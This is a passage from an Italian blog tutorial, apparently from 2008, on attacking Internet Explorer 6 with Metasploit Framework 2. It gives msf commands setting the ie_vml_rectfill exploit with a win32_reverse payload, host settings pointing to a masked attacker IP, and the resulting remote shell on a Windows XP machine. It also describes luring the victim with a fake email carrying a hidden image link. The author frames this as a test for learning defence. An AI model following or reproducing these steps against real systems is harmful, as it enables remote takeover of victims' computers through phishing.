<p><font color="#ff0000">Target: Windows NT 4.0 -&gt; Windows 2003 SP1</font></p>
<p>Le opzioni de default non vanno bene per il payload che  abbiamo selezionato , visto , come ripeto , che è la vittima a connettersi al nostro fake server , allora devo dargli l&#8217;indirizzo su cui la vittima si connette e noi riceviamo la sua connessione e lo facciamo con il seguente comando:</p>
<p><b><font color="#ff0000">msf ie_vml_rectfill(win32_reverse) &gt; </font>set HTTPHOST 29.XXX.6.XX</b></p>
<p><b>HTTPHOST -&gt; 29.XXX.6.XX </b></p>
<p>Ora basta dare il comando <b>exploit</b> ,(<font color="#0000ff">colore-blue-prompt-vittima</font>), e guardate voi il risultato ottenuto , (gli IP sono stati mascherti con delle &#8220;X&#8221;):</p>
<p><b><font color="#ff0000">msf ie_vml_rectfill(win32_reverse) &gt;</font> exploit</b></p>
<p><font color="#ff0000"><br />
[*] Starting Reverse Handler.<br />
[*] Waiting for connections to http://29.XXX.X.XX:8080/<br />
[*] Client connected from 1.42.XXX.XX:1042&#8230;<br />
[*] Got connection from 29.XXX.6.XX:4321 &lt;-&gt; 1.42.XXX.XX:1043</font></p>
<p><b><font color="#0000ff">Microsoft Windows XP [Versione 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.</font></b></p>
<p><b><font color="#0000ff">C:\Documents and Settings\w33dsmok3r\Desktop&gt;</font></b></p>
<p align="center">***</p>
<div style="text-align:center;"><img src="http://carlitobrigante.files.wordpress.com/2008/01/metasploit_logos_icbm1.jpg" alt="metasploit_logos_icbm1.jpg" /></div>
<div style="text-align:center;"></div>
<div style="text-align:center;">***</div>
<div style="text-align:center;"></div>
<p align="center"><u><b><font color="#ff0000">Ed ecco nelle nostre mani il totale controllo del sistema della vittima.</font></b></u></p>
<p><b><font color="#0000ff">Microsoft Windows XP [Versione 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.</font></b></p>
<p><b><font color="#0000ff">C:\Documents and Settings\w33dsmok3r\Desktop&gt;<font color="#000000">exit</font></font></b></p>
<p><b>exit</b> è stato il comando che io ho dato , perché stiamo facendo un test , ma pensate voi un malintenzionato cosa potrebbe arrivare a fare&#8230;</p>
<p align="center"><b>*** </b></p>
<p> Ecco quindi a cosa serve il <b>metasploitframework</b>&#8230; &#8230;a rendersi immuni da attacchi di malintenzionati , la vittima del nostro attacco infatti , una volta che è venuto a conoscenza della falla di <b>IE-6</b> , potrebbe benissimo pensare di passare a <b>IE-7</b> , rendendosi così immune dall&#8217; attacco con l&#8217; exploit che abbiamo scelto in questo tutorial.</p>
<p>Il <b>metasploitframework</b> , è quindi un progetto grandioso , basta farne buon uso. I metodi di attacco a seconda della vittima e dell&#8217; exploit sono molteplici , io al posto di usufruire del payload<b> <font color="#ff0000">win32_reverse</font> </b>, avrei potuto ad esempio richiamare il payload <b><font color="#ff0000">win32_reverse_vncinject</font></b> in questo caso avrei potuto anche ottenere il controllo grafico del sistema della vittima , tramite appunto l&#8217; iniezione del payload di un VNC control , il programma per gestire da remoto un desktop , che però in questo caso sarebbe stato non autorizzato logicamente.</p>
<p align="center"><b>*** </b></p>
<p>Non dobbiamo dimenticare una cosa però , che nel nostro caso è di fondamentale importanza , e cioé la connessione in un host &#8220;<b>fake</b>&#8221; del sistema vittma , praticamente c&#8217;é stata dopo l&#8217; analisi dell&#8217; attacco e  la decisione di usare l&#8217; exploit <b>win32_reverse</b> , la decisione di creare una <b>fakemail </b>, che conteneva l&#8217; indirizzo <b>IP</b> dell&#8217; <b>host</b> <b>fake</b> nascosto in un immagine che ha fatto in modo che la vittima si sia connessa al <b>server fake</b> , sul quale poi noi abbiamo ricevuto la connessione della vittima.</p>
<p>L&#8217;IP host <b>fake</b> , è stato inserito nella configurazione del exploit con il comando:</p>
<p><b><font color="#ff0000">msf ie_vml_rectfill(win32_reverse) &gt;</font> </b><b> set LHOST 29.XXX.6.XX</b></p>
<p>in questo modo abbiamo ricevuto la connessione , e ci siamo impadroniti del sistema vittima.</p>
<p align="center">***</p>
<p>Come possiamo vedere dagli screenshots che ho fatto gli <b>exploits</b> , i <b>payloads</b> , e le altre istruzioni all&#8217; interno della konsole , ma anche se siha intenzione di usare MSFweb o la gui con MSFgui , sono inserite in modo da essere facilmente riconoscibili&#8230;. questo per rendere l&#8217; idea è uno screenshot realizzato per l&#8217; uso di <b>MSFweb</b>.:</p>
<div align="left"><a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-11.png" title="msf-11.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-11.thumbnail.png" alt="msf-11.png" align="left" /></a></div>
<p align="center">&nbsp;</p>
<p align="left"> <a href="http://carlitobrigante.files.wordpress.com/2008/01/msf-12.png" title="msf-12.png"><img src="http://carlitobrigante.files.wordpress.com/2008/01/msf-12.thumbnail.png" alt="msf-12.png" /></a></p>
<p align="left">uesto della webinterface però è un uso che consiglio esclusivamente a coloro che devono familiarizzare con il progetto oppure con Shell e konsole , perché altrimenti è facile capire che la prestazione è meno performante.</p>
<p align="center">***</p>
<p align="left">Come possiamo vedere exploits e payloads sono inseriti in stile &#8220;<b>exploit &#8211; applicazione affetta da vulnerabilità e causa</b>&#8220;</p>
<p align="left">Infatti se prendiamo il caso da noi analizzato e sfruttato per l&#8217; attacco , possiamo vedere che:</p>
<p align="left"><font color="#ff0000"><b>ie_vml_rectfill                Internet Explorer VML Fill Method Code Execution</b></font></p>
<p align="left">Infatti:</p>
<p align="left"><b>Nome dell&#8217; exploit :</b>  <font color="#ff0000"><b>ie_vml_rectfill</b></font></p>
<p align="left"><b>Applicazione affetta : </b> <font color="#ff0000"><b>Internet Explorer</b></font></p>
<p align="left"><b>Causa : </b><font color="#ff0000"><b>VML Fill Method Code Execution</b></font></p>
<p align="left">Per vedere una scheda più completa riguardante gli exploits di cui possiamo servirci , possiamo sempre connetterci al sito del progetto ed avere così una conoscenza più dettagliata.</p>
<p align="left">Sempre per il nostro caso a <a href="http://metasploit.com/projects/Framework/exploits.html#ie_vml_rectfill"><b>questa</b></a> pagina ci sono tutti i dettagli , anche se non dobbiamo dimenticare che in backtrack è inserito , ma il framework alla versione 2 non è più supportato , quindi non può essere più effettuato nessun UPdate , cosa che deve essere sempre eseguita prima di ogni test , in modo da avere a disposizione tutti gli exploits più nuovi e di sonseguenza più efficaci.</p>
<p align="left">La cosa importante da capire è che digitando il nome dell&#8217; exploit nel motore di ricerca si ottiene come risultato la scheda tecnica dello stesso , e possiamo analizzarlo in tutte le sue caratteristiche , anche per il fatto che dalla pagina dell&#8217; exploit nella scheda del progetto ci sono anche delle referenze a siti esterni come <a href="http://www.milw0rm.com/"><b>milw0rm</b></a> e <a href="http://www.securityfocus.com/"><b>SecurityFocus</b></a> ,che contegono inoltre anche i link per le rispettive patch.</p>
<p align="left">MetasploitFramework è un progetto troppo grande per essere trattao unicamente in un articolo/tutorial , ed è per questo che abbiamo realizzato un videotutorial e che non sarà l&#8217; unico , anche se tratteremo prossimamente nuovi argomenti importanti , ogni qualvolta che uscirà una qualche novità rispetto al framework saremo lieti di darla e testarla.</p>
<p align="left">All&#8217; interno del nostro BOX , inseriremo tutti i testi possibili per la comprensione di questo stupendo progetto , alcuni saranno anche nostri , ma la maggiorparte provengono come è logico che sia dal sito del progetto Metasploit , che personalmente tengo e consiglio di tenere sott&#8217; occhio.</p>
<p align="left">ciao a tutti e alla prossima.</p>
<p align="center">&nbsp;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/carlitobrigante.wordpress.com/194/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/carlitobrigante.wordpress.com/194/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/194/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/194/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/194/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=194&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/01/28/metasploitframework/feed/</wfw:commentRss>
		<slash:comments>36</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/02/resource.png" medium="image">
			<media:title type="html">resource.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/metasploit_logos_main.gif" medium="image">
			<media:title type="html">metasploit_logos_main.gif</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-2.thumbnail.png" medium="image">
			<media:title type="html">msf-2.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-2.thumbnail.png" medium="image">
			<media:title type="html">msf-2.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-3.thumbnail.png" medium="image">
			<media:title type="html">msf-3.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-4.thumbnail.png" medium="image">
			<media:title type="html">msf-4.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-7.thumbnail.png" medium="image">
			<media:title type="html">msf-7.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-8.thumbnail.png" medium="image">
			<media:title type="html">msf-8.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-7.thumbnail.png" medium="image">
			<media:title type="html">msf-7.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/metasploit_logos_icbm1.jpg" medium="image">
			<media:title type="html">metasploit_logos_icbm1.jpg</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-11.thumbnail.png" medium="image">
			<media:title type="html">msf-11.png</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/01/msf-12.thumbnail.png" medium="image">
			<media:title type="html">msf-12.png</media:title>
		</media:content>
	</item>
	</channel>
</rss>